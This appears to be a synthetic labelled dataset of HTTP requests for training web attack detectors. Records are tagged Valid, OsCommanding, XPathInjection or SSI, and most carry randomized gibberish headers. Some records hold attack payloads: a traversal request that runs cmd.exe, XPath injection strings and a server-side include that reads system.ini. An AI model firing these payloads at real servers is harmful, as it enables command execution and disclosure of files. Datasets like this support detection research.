Cookie: zOtT1ere=Heiteoh4lgoyasc;9nfBmijoryeeoi=<<a0efb@itle;u8iY=o7B0sX;nyfmpRconnectQ=nsohc;ri1nlofas1Esnp=2;ihed1ud7yaoeala=;sw
Cookie2: $Version="6"
Date: Mon, 13 Aug 07 04:58:34 GMT
ETag: W/"95MocJfVdQq6DGH"
Expect: 100-continue
From: uq6Ima@5ccuIm.net
If-Modified-Since: Tue, 03 Mar 09 10:01:16 GMT
If-Unmodified-Since: Mon, 23 Mar 09 22:22:07 UTC
If-Match: ".yJlnmUiEz4nUPtF"
If-None-Match: "S65JCG-9SvA01JX9P"
If-Range: *
Max-Forwards: 325
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: talo ncd7uini=a2NreaE
Range: 01-5579,5729-
Referer: http://www.Jw5v.st/8oeNn/sn4nqi/mEsowa.php3
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.9 (Windows; U; WinNT 1.7; tt-eS; rv:2.6.4) Gecko/14133063
UA-CPU: x86
UA-Disp: 344,093,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 186x0429
Via: 0.7 95.146.191.109, HTTP/0.4 173.203.131.118, 8.3 www.yhentTd.jpeg:71
Transfer-Encoding: tNxih
Upgrade: ocwua/7.0, sAmh/4.1
Warning: 629 51.114.84.67 "oerorR" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8842
Start - Id: 32134
class: Valid
GET /sdetehst9rto/N6CUacceptonMtIQDh/0_Rn7vt0sCcKZmTgPu/mell4kDSq@wnckRm@l/8nCaK99U9nat4-T5X6/aVqC0wGZ0b_j/cgETW1/eu5/WG./djFciFRRpn2A/iwece6IEyqo.html? HTTP/1.1
Host: 132.65.176.187
Connection: rltetm
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 70.112.71.224
Cookie: @qaBHwKthN-6=fFlSWwTrQYR;eno1ansb=26;Tntt0hEyrgaryhn=0297308;h6nooauel=imia
Cookie2: $Version="568"
Date: Wed, 27 Oct 04 12:23:56 UTC
ETag: "CH.WFiPEwxl1KjUgSnC"
Expect: boto
From: ahsa77vo@rhiriyoEa.net
If-Modified-Since: Sat, 04 Oct 08 11:56:59 GMT
If-Unmodified-Since: Tue, 25 Apr 06 03:46:03 GMT
If-Match: "xpkQ3LaDIqWnnOckzX"
If-None-Match: *
If-Range: Wed, 13 Dec 06 12:09:28 UTC
Max-Forwards: 5
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM ZGxpMnplaW4ya2VsZW9mYXRkdExvYmdpY3RjenJvdXN0c3M0M3Q=
Authorization: Digest cnonce="hlTeeig"
Range: -158831,4-,452-53031
Referer: /srao6/oNtgreah/olaa/tiLh/fioemeio.pdf
TE: gzip;q=0.9
Trailer: Accept-Language
User-Agent: Mozilla/2.3 (compatible; MSIE 2.7; WinNT; sbabrninSy)
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7140x9555
Via: aIptxi/5.2 www.euCdeie.jpg:3643
Transfer-Encoding: gzip
Upgrade: aesjar/3.6
Warning: 115 www.S7ls.gif:1 "aelg9iTbtndhtop1Hiir" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32134
Start - Id: 8511
class: Valid
GET /ihmvsohiUNeehu/rp9t/Hdxprse5fDar/EnVlibandGnetcat9X-B.html?hlvnHdsheutrjpa=tt7fTedocumenta&oeeyste=lepa&dsmaznluaeveauw=eOulH9&iteq0syre=rn&hjKpositiont5=3nops0+pr6atp&35ay=70210744 HTTP/1.0
Host: 83.149.151.229
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 118.234.207.145
Cookie: nnNvnuNbsUt=1;hrorwnlD=nhtls7ahn;9ulhKofl4eep=stern1;alvstehfqernego=samare4jElddh4?ahesm&;eeejhnmbeaea=19
Cookie2: $Version="1"
Date: Sun, 07 Mar 04 03:19:19 GMT
ETag: W/"LPXfxilxLDxFUQD"
Expect: 100-continue
From: esnowat@SliNzma.gov
If-Modified-Since: Fri, 08 Sep 06 09:47:30 GMT
If-Unmodified-Since: Fri, 17 Jun 05 05:13:31 GMT
If-Match: "95vL@Ku9Xh.aPHL-"
If-None-Match: *
If-Range: Tue, 18 Nov 08 16:42:23 GMT
Max-Forwards: 9482
MIME-Version: 7.7
Pragma: e7popms=66tRr9
Proxy-Authorization: Basic bnQ0ZTp0TGV0
Authorization: Digest cnonce="eehiq"
Range: 288-033,80242-026
Referer: http://txepr1.it/qopua/oo0reyCd/0ann.txt
TE: deflate;q=0.8,gzip;q=0.2
Trailer: Authorization
User-Agent: Mozilla/5.4 (Windows; U; Windows NT 5.1; eo-vs; rv:7.1.0) Gecko/57185219
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 549x2783
Via: 6.3 www.est2s.png
Transfer-Encoding: identity
Upgrade: Rkttt/8.8, r9on/0.9, pnI/3.5
Warning: 064 196.134.255.121 "tindgdbhs" "Sun, 04 May 08 02:40:03 GMT"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 116122935
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8511
Start - Id: 36444
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.Lmbse.ch
Connection: noif
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress, identity, identity
Accept-Language: ePl-9sa;q=0.2, rdgx-naoNu2
Cache-Control: max-age=5
Client-ip: 253.249.181.175
Cookie: nts=fno;a9nn=w1
Cookie2: $Version="10"
Date: Sun, 19 Feb 06 06:23:39 GMT
ETag: W/"QcQUC6TnA4cSdTY9asB"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Tue, 03 Jan 06 20:32:04 CET
If-Unmodified-Since: Sat, 28 May 05 14:28:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1615
MIME-Version: 8.0
Pragma: c2fqred=Ddnj
Authorization: Digest response="dCb9D4d7cCe23F8b224438BD3a3Ee8E8"
Range: 18-43314
Referer: /ilhiicu/9arlqtr/aler/i5ygin.asp
TE: deflate,trailers,chunked;q=0.8
Trailer: Trailer
User-Agent: Mozilla/9.3 (X11; U; Solaris 1.1; in-nN; rv:2.7.6) Gecko/49662905
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: 9.7 www.wtmnbFs.htm, Iot8a/9.0 www.emhoxf.jpeg, FTP/7.8 4.87.94.39:7108
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 92.128.39.126
----: ---------------------------

null

End - Id: 36444
Start - Id: 5528
class: Valid
POST /ibstscptPdelLihr/aua/b17fs6Y/6jnoRR-ZP/pOaopDq/Sirircil5aeaxd/rfrxyie/lsMSechok-yiinputB9J8/xHvLy/ekGgrbLemuIUG/BxIv.NL_WedropR_3/ew3ps2zNoae.gif? HTTP/1.1
Content-Length: 132
Content-Language: tlmjah3t,clviihar
Content-Encoding: identity
Content-Location: /tti5of/eeeve/ylstg2/cb8Itxc/tia8TSt.asp
Content-MD5: b2VydVlzcml0M29pWXQ3bA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Jun 04 24:41:25 GMT
Last-Modified: Wed, 08 Mar 06 21:16:44 GMT
Host: 37.181.8.36:3112
Connection: keep-alive
Accept: text/*, text/xml;q=0.3, image/*
Accept-Charset: x-mac-roman;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 236.72.177.33
Cookie: oEr=sqetc;1oirssash=am3qU;nd3ezrsp6augheH=ynrudoosmyaNet;n-Fftp=5;axnyeqstBlNt7=2ebi
Cookie2: $Version="35"
Date: Sat, 22 Apr 06 12:15:26 GMT
ETag: "V_qErrkrpRelawPe-"
Expect: t26cwr=ixeiaa
From: rCwltOn@8nntmteThr.de
If-Modified-Since: Mon, 18 Apr 05 21:35:57 GMT
If-Unmodified-Since: Sun, 29 Nov 09 01:43:16 GMT
If-Match: "XpzupU8.KsvfaTah2"
If-None-Match: *
If-Range: "Ei4TuqLG65yfax7r7"
Max-Forwards: 4433
MIME-Version: 4.0
Pragma: isgkerj=oit
Proxy-Authorization: Basic aVlpaXplOjNnc25wYW10
Authorization: cisawa nemdlls=lwile
Range: 88833-,356615-47,5006-
Referer: http://www.2sna.org/5entdea/nteta/gkaaoee1/ehl2kdoO.png
TE: gzip;q=0.6,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: utyfAaeaoPeibir
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 161x6409
Via: 6.3 www.oe1n.html
Transfer-Encoding: identity
Upgrade: Hihns/1.6, ORos/3.8, etn9/6.1
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 5097796244152405039
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rV289andbVETN=daovRfEftu&2t2kSyY=-ylwEnecerenn&jycbk0mrhuoviwT=877&lss7e=q@ina's&tKoeiC=xrmrtpvbscriptuto=r9o&85SOM.3=05398426

End - Id: 5528
Start - Id: 31261
class: Valid
GET /nea0/wr3hSsxFUHSE44Dvha-/enatreiEnygiioAetijd/lBS0PawZJjs54wlDMy/dv0yabsDLr7riitudx/xKdw/HVp6rcpzv/j06JGBBlogtHYFS/y8fp0tre/-F/hyD@tZJebhL/td2loaeoasYOaqnKob4E.css?amdjis6=25&e9m3srsieR=tqdz+r+gA&nesojra=%5Bpar HTTP/1.0
Host: www.18bdpgrme.org:3
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: t8eojbh-ifann2;q=0.3, ew-rnthp5ns;q=0.6
Cache-Control: no-store
Client-ip: 162.208.165.198
Cookie: sdegh=59esdneyxFaue
Cookie2: $Version="94"
Date: Thu, 01 Nov 07 13:32:45 UTC
ETag: W/"bPlt6P5ycBWrwMkF1C5U"
Expect: 100-continue
From: mzwlem@n1nsea.org
If-Modified-Since: Sat, 17 Nov 07 17:25:32 GMT
If-Unmodified-Since: Thu, 04 Mar 04 22:57:49 CET
If-Match: "0GB4VU899.lH_KS8n3g5"
If-None-Match: "TLLmWYa6Yzsb11WG.CP"
If-Range: *
Max-Forwards: 9290
MIME-Version: 4.6
Pragma: b6txnrsn=y
Proxy-Authorization: Basic c2FhT2g6MHJPc2xlM3Q=
Authorization: Digest uri=/yTteCo/xsehf.css
Range: 019-,893-4434
Referer: /tHaei/Stlek/SFtp.wmn
TE: gzip;q=0.8,deflate,deflate
Trailer: From
User-Agent: Mozilla/5.9 (Windows; U; Win98 1.2; po-iu; rv:2.8.3) Gecko/62104152
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3795x126
Via: FTP/9.4 87.85.253.161:98249, FTP/5.0 www.rrael.tiff:85174
Transfer-Encoding: compress
Upgrade: vn4e/1.5, o4t/2.0, qsr1e/6.0, tmD/0.8
Warning: 160 www.s6Dl4nG.js:02 "wyNAeNlmsnn6" 
X-Forwarded-For: 231.214.129.29
X-Serial-Number: 65900782326
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31261
Start - Id: 7358
class: Valid
PUT /PxTaoDAedQT/jcbinikVzXaQnafSH/bdreunh3/EoUSform2%uPBvK3/mBH/2znMVWMlIzoTwb.A/rRVPTSFFWhJamWbAga/gEeQ@q/Ar5h6ytsi/87FqDPexZTb.mspx? HTTP/1.1
Content-Length: 194
Content-Language: aeunnh,S
Content-Encoding: identity
Content-Location: /3hso8eAe/lnsmt/rasib/ycbu.jpg
Content-MD5: ZWVhbmxlN3NCdHJ5d2NyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jan 08 22:24:20 CET
Last-Modified: Mon, 21 Sep 09 18:41:46 UTC
Host: www.3nE8.it
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, x-mac-icelandic;q=0.3, cp-950, iso-10646-ucs-2;q=0.9, x-mac-japanese;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 40.118.223.19
Cookie: maoywSiyrzneaa=kmbin9n;nm=84;rdsrtlHRkveeiS=ehap;njeeuontt=td
Cookie2: $Version="0"
Date: Sun, 26 Sep 04 20:52:50 CET
ETag: "9CbyWaf_xiRfSZA47"
Expect: 100-continue
From: meeit@m7Q8t.cz
If-Modified-Since: Tue, 20 Oct 09 12:58:47 UTC
If-Unmodified-Since: Mon, 23 Feb 09 16:42:15 UTC
If-Match: *
If-None-Match: "42_A2UDDf-.VBkIl"
If-Range: Mon, 09 Mar 09 13:27:07 GMT
Max-Forwards: 64
MIME-Version: 3.6
Pragma: 5tel1uBe=onll
Proxy-Authorization: Basic eW5lb3RJek86NWZjdA==
Authorization: Basic bG1od2R3bDpuRDd0bQ==
Range: -38,928255-,664-
Referer: http://www.at9e.de/3en06/no73sras/hsmoheic/A0meeige.jpeg
TE: trailers,deflate;q=0.6,trailers
Trailer: User-Agent
User-Agent: e0oDSot (dq562Q0_g; emzvSKQybu; o2wMdvJ82r; d67jrTZxI@)
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 626x2025
Via: HTTP/5.4 129.57.42.198
Transfer-Encoding: gzip
Upgrade: heer/1.8, hjiO/5.4, eAtc/2.6, eotk/8.4
Warning: 556 134.7.7.53 "loiQefflen" 
X-Forwarded-For: 199.98.82.192
X-Serial-Number: 33978029627174385263
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

YorwR=ei&vhe7Nria=7exts9dsi&cbt8=soEihn7rnler&a8ddsb=drnsiWernxune&epetlh3j30iHieT=77310540&84m8EPMmPqWperl=aW2fanE6idhg&inruisr=n =nsi&3VEc=71344&nv=359252602&mThatrqhsv0Bl=t+oct'select3s

End - Id: 7358
Start - Id: 12152
class: Valid
GET /dQX@T./y775vvGs-E0-8Adr/bie7taOe/bioceesttcicrnT/jjm2replaceimgRER.msf?uM4=tgpdk&e2etane9xui=a+i%3F&fsiar=neqan8fdOe&trchsea5achne=659&Ystdinaccess_logX@mJc=uolixp_h%40&ujatagR3tiaa=+ear&bt8jMasytspPd=a&kayBinsertCO=rn%3EVL%25Exsns7&rtziumeguf=taeiropen0neIh&tuhcftf=7274 HTTP/1.1
Host: 214.232.131.85
Connection: close
Accept: text/*;q=0.9, text/*;q=0.2, audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: f-ud;q=0.3, nhs-auiii0it
Cache-Control: only-if-cached
Client-ip: 110.164.174.247
Cookie: e2piah=0408;tgou2eS7sohsrHz=mEns1sDrawnteaem
Cookie2: $Version="2"
Date: Wed, 04 Nov 09 24:37:20 GMT
ETag: W/"5IhzSy0ig9I@2@quDlw"
Expect: iua6o=sshe;Gant
From: ntao8@Is3i.net
If-Modified-Since: Tue, 18 Jul 06 14:56:03 GMT
If-Unmodified-Since: Fri, 18 Apr 08 05:43:44 UTC
If-Match: *
If-None-Match: "mBOItQh1mNz_qz6cyZr"
If-Range: Wed, 06 Jun 07 10:38:06 CET
Max-Forwards: 29
MIME-Version: 1.4
Pragma: i='tMr'
Proxy-Authorization: Digest nc=6E59aab8
Authorization: uazb jrwi=Iyfrm
Range: 334793-5273,194-
Referer: /txeed/8xpTxs.dll
TE: gzip;q=0.2,trailers
Trailer: If-Range
User-Agent: Mozilla/0.3 (compatible; Konqueror/6.7; Mac OS X; OlweshcaE; stndfllrN; thradntt)
UA-CPU: StrongARM
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 438x0789
Via: 8.9 www.l61c.shtml, HTTP/1.8 www.nRahv.html, eimvn/3.7 www.doaTaebs.tiff
Transfer-Encoding: compress
Upgrade: necoeD/4.9
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12152
Start - Id: 5280
class: Valid
POST /iK/rj6yGVsuIRDxLi/ctYrdWP0IU3autoexecYd.shtml? HTTP/1.0
Content-Length: 301
Content-Language: N
Content-Encoding: identity
Content-Location: /ei3nl4t.php4
Content-MD5: bGUxZWpyczRhc2xkbXdycw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Mar 06 15:51:42 UTC
Last-Modified: Sat, 03 Jun 06 03:13:41 UTC
Host: 169.50.36.65
Connection: za9utywx
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress, compress;q=0.9
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 125.203.178.102
Cookie: Htpaqreqetk=38
Cookie2: $Version="82"
Date: Tue, 20 Nov 07 22:33:37 CET
ETag: "TiPtZqe-ErUpLYpGLK7c"
Expect: 100-continue
From: rpfz@tmadFbssh.cz
If-Modified-Since: Thu, 22 Apr 10 17:13:30 GMT
If-Unmodified-Since: Fri, 02 May 08 02:25:40 UTC
If-Match: "AK0-9pAq1bF83zyeg_c0"
If-None-Match: *
If-Range: Fri, 24 Feb 06 13:09:05 CET
Max-Forwards: 6767
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: aghv eebTs=nisatc
Authorization: NTLM b25iZEFuSWVheW1ybmV3clJsbGVsMWFpMnJhYVRyY0hobzByc25jb2hUZWV0aA==
Range: 44-,39-,850121-
Referer: /ar0ieci/wtrchb2r.jsp
TE: chunked
Trailer: If-Range
User-Agent: kz-5MG0iU http://www.lARid.st
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4414x768
Via: ldexif/8.6 www.0Ndm.js
Transfer-Encoding: identity
Upgrade: vnWhh/6.9, 0cx/5.3
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 178.75.102.4
X-Serial-Number: 811738271596
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

ROgLshutdown=wn9eSduaatoecho&tqwec7xiejam=um3twfsascript&u8ph7RB=8188718&gzziik9stlste=ecin&caDEfla=Nyy>eeat&VGsLunionJ=dsmles5luNciIwd&dici29ttuanrh=and&uieoaoed1a=0&eeeNmr=osemceevosanFedrdl&eshf5onXo=bgsounds&L5GQcmdeeval_MMBS=5545404072&s1seT9d=y4jnfytlaSljq3eao&zOtetiaoosdod=nSell?0(d < 

End - Id: 5280
Start - Id: 35536
class: XPathInjection
PUT /cafthpdx.css? HTTP/1.0
Content-Length: 379
Content-Language: hkh,q8cestd
Content-Encoding: gzip
Content-Location: /idom.jpeg
Content-MD5: Y2VlbGFhb2VlbnI2aG1paQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Oct 05 14:26:31 CET
Last-Modified: Mon, 13 Mar 06 06:07:47 UTC
Host: www.eA2lir.it:6214
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, x-mac-arabic;q=0.5
Accept-Encoding: gzip;q=0.5, gzip, gzip;q=0.1, compress;q=0.4
Accept-Language: Mu9k6-zh9tn;q=0.8, F-y;q=0.0, 6bs-s0eu;q=0.1
Cache-Control: max-stale=73716
Client-ip: 0.8.80.214
Cookie: oycrtrcgortE=825;inqcltvhltb59=aeHm0XqPdX
Cookie2: $Version="80"
Date: Mon, 20 Feb 06 15:35:52 UTC
ETag: "gXOT@1LT1XonrRqHV.s"
Expect: 100-continue
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 20 Jan 08 13:06:43 UTC
If-Unmodified-Since: Tue, 04 Jan 05 05:42:29 CET
If-Match: "6eCNHQzjAurm-N8pVwI7"
If-None-Match: "D16dcGXKggrg-e3Zcta"
If-Range: *
Max-Forwards: 50
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic dnVhN3M6bnByMmE=
Range: 7-26018,971548-,-1
Referer: http://www.sTrhl.ch/s2fotemn/aormioig.aspx
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/2.1 (Windows; U; Windows NT 2.3; zE-Rw; rv:1.7.0) Gecko/11250799
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: wwfubf/2.3 225.79.153.111
Transfer-Encoding: identity
Upgrade: rqh/0.3, h5Re/1.2, 2i9ytr/6.7, dnnc/3.7, eie/9.3
Warning: 074 www.hio17hmp.gif "oloAfT" 
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ooGzcat=ichlJB6yC-&rnE=oodqgtlikev43?D&Pcoo=0&oed9oa9a3fS=6110&hesanecntNl3lh=265700&vSIdmK-Sa7w2=2272&VjGjOdGor=sSTvNZpK_&ieeqc=7ia'    or  U/al2x/child::node()[processing-instruction()=904]   or    'eJhbsn7S'=   '&5Dnhs9yyis=se0&dcsaHr4te3=2703&Dqtfto0eg8s=24695&onar=yDdozz8n7services&Le4ttrtyc=533&Sim7qe=arechoChomew?=3and:si  nph-dSn

End - Id: 35536
Start - Id: 40688
class: SSI
GET /u-/im/nRV.shtml?mochaGAbNlGJi4=%3C%21--++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&ifRyslTme=06183397 HTTP/1.0
Host: 207.197.227.75
Connection: close
Accept: image/*;q=0.5, image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 1eheh5-d9g;q=0.6, gdaaean4-cwna, k-sikuh1;q=0.8, setuaO-enqeixe;q=0.7, hsi-n;q=0.6
Cache-Control: max-stale=4509
Cookie: ciaamiwdoq=E%eespeMhse;iH=82839;qs4tEyewna=eHsz@uPC;oSAC8sEBrFprocessing-instruction9=ao2 anrs1eWbnrma;do=61057
Cookie2: $Version="70"
Date: Fri, 29 Jul 05 10:51:00 GMT
ETag: "UMIPMIln1m1O-mcDqb"
Expect: 100-continue
If-Modified-Since: Thu, 17 Jun 04 19:34:27 GMT
If-Unmodified-Since: Tue, 23 Sep 08 09:01:38 UTC
If-Match: *
If-None-Match: "6cUTTTiIhp-bvjIewa5"
If-Range: Wed, 31 May 06 09:30:07 UTC
Max-Forwards: 948
MIME-Version: 0.6
Pragma: etmtc=rzres
Referer: /oiEiesdn.swf
TE: gzip
Trailer: Expect
User-Agent: Mozilla/2.7 (X11; U; Open BSD i386 6.7; o6-ne; rv:9.6.6) Gecko/47817739
UA-CPU: x86
UA-Disp: 662,039,16
Via: FTP/9.0 164.4.105.68:320, FTP/5.5 127.13.253.132:53
Transfer-Encoding: deflate
Upgrade: jre/3.8, na6R91/0.3
X-Forwarded-For: 31.11.7.35
X-Serial-Number: 83232697780
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40688
Start - Id: 2377
class: Valid
GET /ni7.tiff?NhsroN7Eyh=ed%26c&noomssA=2673 HTTP/1.0
Host: 104.98.97.124
Connection: close
Accept: text/html, application/rtf
Accept-Charset: x-mac-hebrew;q=0.4, x-mac-hebrew;q=0.3, iso-8859-1;q=0.5
Accept-Encoding: 
Accept-Language: i-ed, wwir-ibsx, 5o-htc;q=0.3
Cache-Control: no-store
Client-ip: 165.164.249.129
Cookie: hiaucbn8=pnCujhsnn4lnnl
Cookie2: $Version="665"
Date: Mon, 03 Jul 06 10:39:14 UTC
ETag: W/"HfLLigl2V_jPpDU0j"
Expect: g9uzato=ee1sn
From: ssmE@EDar2top.be
If-Modified-Since: Wed, 06 Feb 08 05:47:28 GMT
If-Unmodified-Since: Mon, 05 Apr 10 09:00:34 UTC
If-Match: "S0yx-3-ZQTZu9@d"
If-None-Match: *
If-Range: Sat, 20 Feb 10 22:09:26 CET
Max-Forwards: 044
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: Basic T29lbmxIOjhEdG1iOE4=
Range: 7-40040,63-,119158-
Referer: /inlt/ofbucim/iaac/tyTnad.css
TE: trailers,gzip;q=0.3,trailers
Trailer: Warning
User-Agent: deeleoct/2.3.2.1.4
UA-CPU: PowerPC
UA-Disp: 311,7575,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 3780x3384
Via: HTTP/8.3 www.qr1Nc1.tiff, 1.7 www.uscxxeih.shtml
Transfer-Encoding: f09sib
Upgrade: luna/1.4, rEaav/2.7, aete/3.1, 2Cr5Ms/7.2, fsh/5.6
Warning: 147 www.uasbn7.js:57429 "tEetcorieaaNo4nDtsS" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 67775
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2377
Start - Id: 28585
class: Valid
GET /tea8ndonvO/neaukznfhrndctscyad/SkE9b64vVXJalliK/Mlimet8sjratdahe/ylOvtafrCAMs26y/ApasswdcPFTl/atEl0g4080Ae/t_lsqd3xcFokX65/Armygieothoil/dimgPCa4scriptG6cUw/s__wivO4KVCZPdpchm.shtml?cdivUX=%3Deoi%7ES1%5Chn%2B%3E&u6wUu8sus=+uw9+&tnCm=20319688&vs0LanmBcia6=eJkAIpieiioth&Nosdtisgo=sm5aoeoWhm&si=nFT4V&uotsecegHn6b2w0=188&iu6o=153 HTTP/1.1
Host: 253.140.41.35
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh;q=0.7, utf-8;q=0.7, koi8-r, ks_c_5601-1987;q=0.3
Accept-Encoding: identity, identity, compress;q=0.9, identity;q=0.7, deflate;q=0.2
Accept-Language: *
Cache-Control: max-age=57
Client-ip: 229.30.104.92
Cookie: s9np3aie=l5eii5ml on;ehtth2lieseLsen=trt2yoeoMsdrwwt;cg9=1345;fZWz=9on0j
Cookie2: $Version="695"
Date: Mon, 17 Apr 06 06:48:12 GMT
ETag: W/"PmvCxYPdShnvt9U4.y4x"
Expect: oThesljQ
From: toIs6eah@Rhqboi.biz
If-Modified-Since: Tue, 24 Jul 07 08:04:07 GMT
If-Unmodified-Since: Tue, 17 Jan 06 08:42:20 UTC
If-Match: *
If-None-Match: "Qn7OH_guRn08khq"
If-Range: "yrfP33wJv7GXjrJ_j"
Max-Forwards: 4
MIME-Version: 9.2
Pragma: 2rdtA='y1tie'
Proxy-Authorization: e2tail hr1e4m=wkelnmb
Authorization: rany TOTmmk=ardTi
Range: 8-800450
Referer: /DoTwXet/uahryP/tezrht.rar
TE: chunked;q=0.6,gzip;q=0.2,gzip
Trailer: Max-Forwards
User-Agent: tTqaPlxj9l/5.3
UA-CPU: PowerPC
UA-Disp: 9594,2668,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2416x4486
Via: HTTP/0.2 www.rfteo.tiff, 6.0 www.ondodq.tiff, 0.3 www.Hsh6h.htm
Transfer-Encoding: deflate
Upgrade: thto1/0.0, nre/1.4
Warning: 892 www.Cslorh.tiff "4nseq" "Sun, 03 Dec 06 21:05:26 GMT"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 37650652134780806
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 28585
Start - Id: 48608
class: XPathInjection
PUT /aR-7kheZckaK.sh? HTTP/1.1
Content-Length: 337
Content-Language: cObumht,hn,ic
Content-Encoding: gzip
Content-Location: /irottr9o/otnmi/cdsa2te1.asmx
Content-MD5: a2l3ZWllaGx3ZGlvZGVvdw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 07:58:55 GMT
Last-Modified: Sat, 24 Jan 09 02:33:04 UTC
Host: 106.128.179.218
Connection: keep-alive
Accept: application/zip;q=0.3, audio/basic
Accept-Charset: windows-1251, cp-950
Accept-Encoding: 
Accept-Language: Saenae-rZa;q=0.6, Ti-co, 6rt-ilh;q=0.3
Cache-Control: no-transform
Client-ip: 209.23.17.108
Cookie: QflikephavingdocumentSrHhVl=to;aX5ndemcorrwot=8
Cookie2: $Version="99"
Date: Thu, 04 May 06 24:33:21 CET
ETag: "pJxJ92AJ3eoiDG3vZ9"
Expect: bpagaX=Ixsnlib;lyp7n3K
From: oetv@ciasa9meg.net
If-Modified-Since: Tue, 25 Nov 08 10:20:34 CET
If-Unmodified-Since: Thu, 04 Mar 04 19:21:51 GMT
If-Match: *
If-None-Match: *
If-Range: "p5R0JJWz7wFOej9Yg"
Max-Forwards: 4
MIME-Version: 4.8
Pragma: ytp='td'
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: odAdE Erng=Eo3n7eeN
Range: 3-574
Referer: http://Fkr90.org/pohot/fmm8/peudijM.txt
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: Mozilla/7.6 (X11; U; Linux i386 0.7; v6-hn; rv:5.5.8) Gecko/49342748
UA-CPU: Sparc
UA-Disp: 7774,1775,32
UA-OS: Windows 95
UA-Color: color16
